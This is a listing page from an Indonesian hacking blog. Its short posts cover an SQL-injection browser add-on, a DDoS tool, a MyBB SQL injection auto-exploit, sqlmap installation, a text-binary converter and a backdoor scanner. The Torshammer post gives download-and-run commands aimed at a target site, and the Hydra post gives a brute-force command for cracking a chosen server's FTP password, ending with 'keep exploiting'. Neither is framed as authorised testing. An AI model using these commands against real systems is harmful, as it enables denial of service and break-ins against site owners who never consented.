Open top menu
Showing posts with label Tools. Show all posts
Showing posts with label Tools. Show all posts
Thursday, December 3, 2015
SQL Injection with Advanced Hackbar


Sebenarnya hackbar yang ini hampir sama dengan hackbar versi original nya, hanya saja lebih powerfull karena ada penambahan tools seperti bypass WAF, Dump in One Shoot ( DIOS ) , dll.  Yang kalian butuhkan hanya mencari jumlah kolom dan angka ajaib nya, dan, hajar dengan DIOS.

Untuk file nya bisa download sisini ;






Tinggal klik kanan > open with firefox > install addons.





Untuk cara menggunakannya bisa lihat video dibawah :










Sekian dan semoga bermanfaat.





Read more
Thursday, October 22, 2015
Cara Convert Text ke Binary atau Binary ke Text Menggunakan Perl

Hali kali ini saya akan share tools untuk meng-convert dari text menjadi binary ataupun dari binary ke text. Tools ini menggunakan bahasa pemrogramman Perl. jadi jika kalian menggunakan windows dan belum terinstall perl, silahkan install terlebih dahuli. Untuk linux user, biasanya sudah pre install.

Link download file :

Text to Binary Tools Download





Cara menggunakannya :

uzumaki@unixsystem:~% ./hex.pl -[opsi] "Kata yang akan di convert"

Contoh :

uzumaki@unixsystem:~% ./hex.pl -t "0111010101101110011000010110110101100101001000000111010101110000011000010111001101110011"


opsi -t artinya kita akan menconvert dari binary ke text.




hasil nya adalah " uname upass "





uzumaki@unixsystem:~% ./hex.pl -b "uname upass"


opsi -b artinya kita akan mengconvert dari text ke binary.



 Hasilnya " 0111010101101110011000010110110101100101001000000111010101110000011000010111001101110011 "



uzumaki@unixsystem:~% ./hex.pl -b -f  file.txt



Opsi -f bila yang akan kita convert adalah file.












Sekian tutor kali ini dan semoga bermanfaat.

Read more
Thursday, January 15, 2015
no image

Oke, kali ini saya akan share cara menginstall DDoS tools bernama torshammer di Ubuntu atau backBox Linux. Tools ini menggunakan script python , namun berhubung python sudah terinstall secara otomatis di Linux, kita tidak perlu menginstall python.

Oke langsung saja ke tutorial.

Pertama, buat direktori untuk menginstall Torshammer.

yuyudhn@yunivita:~$ mkdir tors

Lalu pindah ke direktori tors

yuyudhn@yunivita:~$ cd tors

yuyudhn@yunivita~/tors$ wget http://packetstorm.wowhacker.com/DoS/torshammer.tgz

Ekstrak dengan perintah

yuyudhn@yunivita:~/tors$ tar xvf torshammer.tgz

Sekarang Tors sudah bisa digunakan.

yuyudhn@yunivita:~/tors$ python torshammer.py -t www.example.com -r 50000



Sekian tutor kali ini semoga bermanfaat.
Read more
Tuesday, November 18, 2014
MyBB 1.8.x SQL Injection Auto Exploit

Kali ini saya akan share script python untuk exploit MyBB 1.8.x secara otomatis. metode nya adalah SQL Injection. Ya, seperti yang kita ketahui, MyBB sudah sampai di versi 1.8.1 namun malah ada bug yang sangat fatal di versi baru tersebut yaitu SQLi.

Oke langsung saja berikut ss nya :




MyBB vuln SQLi

Percara kan kalo tools nya work :p

Untuk source code nya bisa lihat disini :

Python MyBB SQLi Auto exploit



Oh iya password nya masih bentuk md5, jadi harus di hash dulu. Terserah mau pake hash online atau tools macam John the Ripper, Hashcat, dll.
Read more
Tuesday, November 4, 2014
Cracking FTP Password using Hydra on BackBox Linux


Oke kali ini mau berbagi tutorial cara crack password ftp menggunakan Hydra. Tools ini sudah tersedia di distro pentest linux macam BackBox, Backtrack atau Kali Linux. Jika kalian menggunakan distro lain kemungkinan tools ini perlu diinstall terlebih dahulu.

Oke saya asumsikan kalian sudah punya tools nya.

Tinggal mengikuti tutorial yang saya berikan disini.

Pertama, tentukan ip server dari domain yang ingin di brute ftp nya.

Jika sudah dapat, masuk terminal, masukkan command berikut.

yuyudhn@b0x:~$ sudo -i 

[sudo] password for yuyudhn:

root@b0x:~# ls
c0der pass.txt tools


disini saya membuat wordlist dengan nama pass.txt di folder root




Selanjutnya tinggal masukkan perintah

root@b0x:~# hydra -l user -P pass.txt ftp://ip_server

Tunggu sampai proses cracking selesai.

Nanti ada notif seperti ss dibawah :





Kita coba login dengan filezilla untuk mengecek apakah password yang didapat adalah benar :



Gotchaaa !! xP



Sekian tutor kali ini, keep exploiting ;)



Read more
Saturday, October 18, 2014
no image

Oke kali ini saya akan berbagi sedikit tips cara menginstall SQLMap di Ubuntu lewat terminal command. Berbeda dengan Debian Kali Linux atau Backtrack yang memang diperuntukkan sebagai OS pentester, Ubuntu memamng tidak dilengkapi dengan tools tools macam sqlmap, dll. namun bagi kalian yang menggunakan Ubuntu dan ingin menggunakan tools tersebut, kita bisa menginstall nya sendiri.

Oke langsung saja, pertama buka terminal ubuntu kalian .

yuyudhn@b0x:~$ sudo -i

hal ini agar kita bertindak sebagai root.

root@b0x:~# wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmapproject-sqlmap-0.9-3671-gdcaad75.tar.gz

Perintah ini dilakukan agar ubuntu mendownload file dari github. Tunggu sampai selesai.



root@b0x:~# tar -xvf sqlmapproject-sqlmap-0.9-3671-gdcaad75.tar.gz

command ini digunakan untuk mengekstrak file yang telah didownload tadi.



Setelah diekstrak, sqlmap tadi ada di folder sqlmapproject-sqlmap-dcaad75

agar lebih mudah, kita rename saja nama folder nya.



root@b0x:~# mv sqlmapproject-sqlmap-dcaad75 sqlmap

Hal ini untuk merename folder sqlmapproject-sqlmap-dcaad75 menjadi sqlmap

.

Nah sampai disini penginstallan sqlmap sudah selesai.

Untuk menggunakannya tinggal diarahkan ke arah folder sqlmap.

root@b0x:~# cd sqlmap

root@b0x:~/sqlmap# python sqlmap.py



Sekian tuor kali ini semoga bermanfaat
Read more
Friday, August 29, 2014
Perl Backdoor Scanner

Oke, tadi iseng iseng di google nemu tools ini. Langsung aja ane share , barangkali ada yang butuh. Tools ini adalah scanner shell/backdoor, tapi berbentuk file.pl /perl . Jadi buat yang pake windows harus terinstall perl dulu.







Untuk file nya bisa didownload disini : Download Perl Backdoor Scanner



Nah, jika kalian tau lebih bayak tentang perkiraan lokasi lokasi shell, silahkan diedit file nya. Karena cara kerja tools ini mirip dengan admin finder, yaitu dengan testing url. :D


Read more